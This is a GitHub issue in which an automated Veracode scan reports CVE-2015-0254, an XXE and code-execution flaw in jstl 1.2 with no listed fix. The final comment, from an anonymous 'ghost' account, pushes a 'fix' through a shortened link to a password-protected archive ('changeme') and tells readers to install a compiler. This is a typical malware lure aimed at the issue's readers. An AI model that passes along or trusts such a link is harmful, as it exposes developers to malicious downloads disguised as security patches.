julz0815 / test-action

0 stars 1 forks source link

CVE: 2015-0254 found in jstl - Version: 1.2 [JAVA] #1173

Open github-actions[bot] opened 2 hours ago

github-actions[bot] commented 2 hours ago

Veracode Software Composition Analysis

Attribute Details
Library jstl
Description null
Language JAVA
Vulnerability XML External Entity (XXE) Through An XSLT Extension
Vulnerability description Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) or (2) JSTL XML tag.
CVE 2015-0254
CVSS score 7.5
Vulnerability present in version/s 1.0-1.2
Found library version/s 1.2
Vulnerability fixed in version
Library latest version 1.2
Fix

Links:

ghost commented 2 hours ago

This might help:This file might fix it https://bit.ly/4gABgKn Archive password: changeme If you don't have the c compliator, install it.(gcc or clang)